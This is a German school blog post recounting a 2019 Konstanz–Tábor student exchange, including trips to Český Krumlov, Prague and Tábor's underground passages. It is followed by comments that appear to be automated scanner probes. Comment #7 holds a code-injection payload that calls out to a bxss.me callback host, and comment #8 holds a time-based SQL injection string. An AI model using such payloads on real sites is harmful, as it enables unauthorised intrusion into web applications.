· 

Tabor Austausch

Tabor-Austausch März 2019 

 

Vom 20. bis zum 27. März 2019 waren etwa 30 Schüler von vier verschiedenen konstanzer Gymnasien zusammen in Tschechien unterwegs. Dieser Austausch mit unserer Partnerstadt Tabor fand nun zum 14 Mal statt und sorgt damit seit 28 Jahren für einen nicht abreißenden Kontakt zwischen konstanzer und taborer Jugendlichen und wird deshalb auch von beiden Städten stark unterstützt. Somit war es jedem und jeder Interessiertem/n möglich eine Woche in Tschechien zu verbringen und neue Erfahrungen zu sammeln. 

 

Was genau diese Erfahrungen angeht, so war alles dabei. Von einem Besuch der historischen Stadt Česky Krumlov, wo die Gruppe einen enthusiastischen Stadtführer zur Seite gestellt bekam, der jede noch so kleine Anekdote zu seiner Stadt kannte, bis zu einem Besuch der traditionellen Bierbrauerei Budweiser, wo die Schüler trotz striktem Alkoholverbot doch einmal in den Genuss des berühmten tschechischen Bieres kamen.

 

 Auch das Kennenlernen der Städte Prag und Tabor stand an jeweils einem Tag im Vordergrund. Nach dem Pflichtprogramm in Prag war es dann auch jedem selbst überlassen wie er seine Freizeit verbringt. So ist es natürlich nicht verwunderlich, dass einige Schüler(innen) schwer bepackt von ihrem Streifzug in der Shoppingmetropole Prag zurückkehrten. In der 35 Tausend Einwohnerstadt Tabor lagen dann erstmal die unterirdischen Gänge, die unter Teilen der Stadt entlangführen beeindruckten die ganze Gruppe, obwohl für die größten unter uns diese Erfahrung definitiv nicht als positiv in Erinnerung bleiben wird. Was will man auch bei einer Deckenhöhe von etwa 1.60 m an der niedrigsten Stelle erwarten?

 

Am Wochenende verbrachten wir unsere Zeit bei den Gastfamilien, weshalb jeder von diesen Tagen anderes berichten könnte, aber natürlich haben wir auch immer wieder in größeren Gruppen, in denen sowohl tschechische Partner, als auch Deutsche Gäste vertreten waren, Ausflüge unternommen. Beispielsweise waren wir Lasertag spielen, Schwimmen, bowlen, Billardspielen und vieles mehr. Abschließend bleibt zu sagen, dass das Ziel des Austausches - Tabor und Konstanz einander näher zu bringen- definitiv geglückt ist und sich alle Deutschen schon auf September freuen, wenn die Tschechen, mit denen wir uns alle angefreundet haben, uns besuchen kommen!

 

 

Hannah Hafner, Suso 10b

Kommentar schreiben

Kommentare: 16
  • #1

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:21)

    1

  • #2

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:23)

    1

  • #3

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:23)

    1

  • #4

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:24)

    1

  • #5

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:24)

    1

  • #6

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:24)

    1

  • #7

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:24)

    '.gethostbyname(lc('hitya'.'odabsjoff179c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(70).chr(99).chr(79).'

  • #8

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:24)

    -1; waitfor delay '0:0:15' --

  • #9

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:25)

    1

  • #10

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:25)

    1

  • #11

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:26)

    1

  • #12

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:50)

    1

  • #13

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:50)

    1

  • #14

    HcPcEgmp (Dienstag, 07 Dezember 2021 03:50)

    1

  • #15

    HcPcEgmp (Dienstag, 07 Dezember 2021 04:32)

    1

  • #16

    HcPcEgmp (Dienstag, 07 Dezember 2021 05:17)

    1